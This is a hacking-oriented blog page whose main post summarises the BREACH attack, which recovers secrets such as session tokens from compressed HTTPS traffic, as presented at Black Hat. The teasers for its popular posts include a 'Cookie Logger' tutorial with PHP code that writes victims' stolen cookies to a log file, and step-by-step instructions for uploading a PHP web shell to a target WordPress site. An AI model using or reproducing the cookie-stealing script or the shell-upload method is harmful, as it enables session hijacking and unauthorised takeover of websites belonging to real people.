Skip to main content

BREACH decodes HTTPS encrypted data in 30 seconds

By 
BREACH decodes HTTPS encrypted data in 30 seconds:-
---------------------------------------------------
 
A new hacking technique dubbed BREACH
can extract login tokens, session ID numbers 
and other sensitive information from SSL/TLS 
encrypted web traffic,in just 30 seconds.
Source:-HACKERS News 
The technique was demonstrated at the Black Hat security conference in Las Vegas (Presentation PDF & Paper) by Gluck along with researchers Neal Harris and Angelo Prado, which allows hackers to decodes encrypted data that online banks and e-commerce sites from an HTTPS channel.
Neal, Yoel and Angelo (From left to right) at BlackHat

BREACH (Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext) is very targeted and don’t decrypt the entire channel. BREACH manipulates data compression to pry out doses of information from HTTPS protected data, including email addresses, security tokens, and other plain text strings.

Angelo Prado told The Hacker News, "We are using a compression oracle is leveraging the building blocks from CRIME, on a different compression context." i.e. To execute the oracle attack, BREACH exploits the standard Deflate compression algorithm used by many websites to conserve bandwidth.
The attacker just has to continually eavesdrop on the encrypted traffic between a victim and a web server before and the exploit requires that a victim first access a malicious link, this can be done by embedding an iframe tag in a page the victim frequents.

The recovery of secret authentication cookies opens the door for attackers to pose as their victims and hijack authenticated web sessions. It is important to note that the attack is agnostic to the version of TLS/SSL, and does not require TLS-layer compression. Additionally, the attack works against any cipher suite.
Labels:

Comments

Post a Comment

Popular posts from this blog

Assembly Language Step-by-step: Programming with DOS and Linux-

By
(-Assembly Language Step-by-step: Programming with DOS and Linux-) The bestselling guide to assembly language-now updated and expanded to include coverage of Linux . This new edition of the bestselling guide to assembly programming now covers DOS and Linux! The Second Edition begins with a highly accessible overview of the internal operations of the Intel-based PC and systematically covers all the steps involved in writing, testing, and debugging assembly programs. Expert author Jeff Duntemann then presents working example programs for both the DOS and Linux operating systems using the popular free assembler NASM. He also includes valuable information on how to use procedures and macros, plus rare explanations of assembly-level coding for Linux, all of which combine to offer a comprehensive look at the complexities of assembly programming for Intel processors. Providing you with the foundation to create executable assembly language programs, this book: * Explains how to use NASM
Post a Comment
Read more

Cookie Logger

By
         Cookie Logger ---------------------------------------------- A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger… Hope you will enjoy Reading it... STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary
Post a Comment
Read more

Bypass while FTP login during wordpress shell uploads .

By
In this post I will be telling you how to bypass FTP login during wordpress shell upload. Sometimes when we are shelling a Wordpress website by uploading a theme in a zip file, it asks for ftp login information. This can be easily Bypassed using the below Method .  First of all, Log In to your target wordpress website, then in the left side, look for  Plugin option, click on it and select  Add New . There you will see a page titled  Install Plugins,  below it look for the option  Upload  and click on it After clicking on the Upload option, you will get a new page asking you to upload the plugin, browse your.php shell for there and click on Upload After the upload process is completed, you'll get the following Just skip this forum, and you are done xD ! Suppose the name of your shell was code.php, so inorder to access it goto http://www.website.com/wp-content/uploads/code.php
Post a Comment
Read more